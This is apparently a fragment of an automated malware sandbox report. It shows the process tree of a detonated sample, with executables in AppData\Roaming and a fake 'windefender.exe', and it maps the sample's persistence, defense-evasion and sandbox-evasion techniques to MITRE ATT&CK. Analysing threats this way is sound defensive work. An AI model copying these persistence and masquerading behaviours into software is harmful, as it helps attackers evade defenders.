C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1260
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7032
-
C:\Users\Admin\AppData\Roaming\37C.tmp.exe"C:\Users\Admin\AppData\Roaming\37C.tmp.exe"1⤵PID:5328
-
C:\Users\Admin\AppData\Roaming\197.tmp.exe"C:\Users\Admin\AppData\Roaming\197.tmp.exe"1⤵PID:6096
-
C:\Users\Admin\AppData\Roaming\197.tmp.exe"C:\Users\Admin\AppData\Roaming\197.tmp.exe"2⤵PID:5136
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:6484
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
2Web Service
1